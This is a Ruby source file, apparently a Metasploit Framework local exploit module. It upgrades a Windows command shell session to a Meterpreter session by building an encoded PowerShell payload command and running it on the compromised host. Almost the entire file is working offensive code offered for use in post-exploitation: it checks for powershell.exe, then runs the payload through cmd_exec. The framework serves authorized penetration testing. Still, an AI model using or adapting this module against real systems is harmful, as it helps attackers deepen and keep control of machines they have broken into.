metasploit-framework/modules/exploits/windows/local/powershell_cmd_upgrade.rb

52 lines
1.4 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::Powershell
include Post::File
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Command Shell Upgrade (Powershell)',
'Description' => %q{
This module executes Powershell to upgrade a Windows Shell session
to a full Meterpreter session.
},
'License' => MSF_LICENSE,
'Author' => [
'Ben Campbell'
],
'DefaultOptions' =>
{
'WfsDelay' => 10,
},
'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'shell' ],
'Targets' => [ [ 'Universal', {} ] ],
'DefaultTarget' => 0
))
end
def exploit
psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"
if file? "%WINDIR%\\System32#{psh_path}"
print_status("Executing powershell command line...")
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
cmd_exec(command)
else
fail_with(Failure::NotVulnerable, "No powershell available.")
end
end
end